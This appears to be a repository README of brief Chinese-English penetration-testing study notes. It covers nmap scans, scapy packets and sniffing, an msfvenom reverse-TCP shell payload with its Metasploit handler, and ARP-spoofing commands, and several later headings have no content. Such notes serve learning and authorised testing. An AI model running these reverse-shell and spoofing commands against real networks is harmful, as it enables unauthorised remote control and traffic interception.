/exploit

Primary LanguagePython

Introduction

socket

nmap wsl

nmap:

Couldn't open a raw socket. Error: Permission denied (13)

主机发现

  • ARP: nmap -sn -PR [IP]
  • ICMP: nmap -sn -PE [IP]
  • TCP:

端口扫面

  • TCP全开
    packet = IP(dst)/TCP(sport,dport,flag='S')
  • TCP 半开
    nmap -sT

服务扫描

  nmap -sV

系统扫描

  nmap -O

scapy

scapy Doc sudo python scapyEx.py

网络嗅探

sniff(filter="")

metasploit

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -b '' -f c

msfconsole
>use exploit/multi/handler
>set payloada windows/shell_reverse_tcp
>set lhost
>set lport
>exploit

SEH(结构化异常处理)溢出

网络欺骗

ARP

arpspoof -i eth0 -t drcCheated src
echo 1>>/proc/sys/net/ipv4/ip_forward #转发
Ether()/ARP(psrc=gatewayIP, pdst=victimIP)
Ether()/ARP(psrc=victimIP, pdst=gatewayIP)

拒绝服务攻击

链路层

网络层

传输层

应用层

身份认证攻击

远程控制

无线网络渗透

web应用渗透

DDOS